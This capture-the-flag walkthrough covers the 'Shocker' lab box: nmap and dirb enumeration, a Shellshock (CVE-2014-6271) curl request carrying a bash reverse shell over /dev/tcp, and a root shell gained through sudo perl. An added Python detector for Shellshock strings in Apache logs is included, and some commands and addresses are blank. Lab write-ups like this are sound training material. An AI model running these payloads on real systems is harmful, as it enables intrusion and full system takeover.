Shocker is an easy Linux box that can be exploited with CVE-2014-6271. Privileges can be escalated through the perl binary, which the user is allowed to run as root via sudo.


Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was the webserver. The user is presented with the following:

I checked the page source with Ctrl+U but found nothing relevant, so I started a directory brute-force with the following command:


This gave the following results:

---- Scanning URL: ----
+ (CODE:403|SIZE:295)                                                                                  
+ (CODE:200|SIZE:137)   


The cgi-bin directory is suspicious: in combination with the Apache version, it indicates a possible Shellshock vulnerability (CVE-2014-6271). However, to exploit it you need to find a file in this directory that you can access. To identify such a file, the following command was run:

dirb -X .sh

---- Scanning URL: ----
+ (CODE:200|SIZE:119)

With this information you can open a netcat shell by issuing the following command:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ 0>&1'

Now you can go to the home directory as usual and obtain user.txt:

shelly@Shocker:/home/shelly$ pwd

shelly@Shocker:/home/shelly$ cat user.txt
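
A defender's view of the request above, as an added example that is not part of the original write-up: it scans Apache combined-format access log lines for the bash function-definition prefix in client-controlled fields. The log lines, addresses and the script name example.sh are constructed for illustration.

```python
import re

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Function-definition prefix that CVE-2014-6271 relies on; optional whitespace is tolerated.
FUNC_PREFIX = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines (documentation addresses, hypothetical script name).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/example.sh HTTP/1.1" 200 119 "-" "() { :; }; echo probe"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html HTTP/1.1" 404 295 "() { :;}; echo probe" "curl/7.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/ HTTP/1.1" 403 295 "-" "Mozilla/5.0 (X11; Linux)"',
]

def find_shellshock_attempts(lines):
    """Return one finding per log line whose logged client fields carry the prefix."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        # CGI passes these client-supplied values to the script as environment variables.
        fields = [f for f in ("request", "referer", "agent") if FUNC_PREFIX.search(m[f])]
        if not fields:
            continue
        parts = m["request"].split()
        path = parts[1] if len(parts) > 1 else ""
        findings.append({
            "line": lineno, "host": m["host"],
            "path": path, "fields": fields,
            "cgi": path.startswith("/cgi-bin/"),  # request reached a CGI location
            "served": m["status"] == "200",       # script answered rather than 403/404
        })
    return findings

if __name__ == "__main__":
    for finding in find_shellshock_attempts(SAMPLE_LOG):
        print(finding)
```

Findings with both cgi and served set deserve the first look, since the request reached a script that answered. Only fields the log format records are visible here; a header such as Cookie is not part of the combined format.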


Privilege Escalation

To find a route to root, run sudo -l, which lists the commands the current user may run with sudo. This will display the following:

shelly@Shocker:/etc/selinux$ sudo -l

Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

    sudo perl -e 'exec "/bin/sh";'

If you see such entries, you should always check GTFOBins for a quick privilege escalation. GTFOBins says the following:

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo perl -e 'exec "/bin/sh";'

By executing that command you obtain a root shell:


cd /root


cat root.txt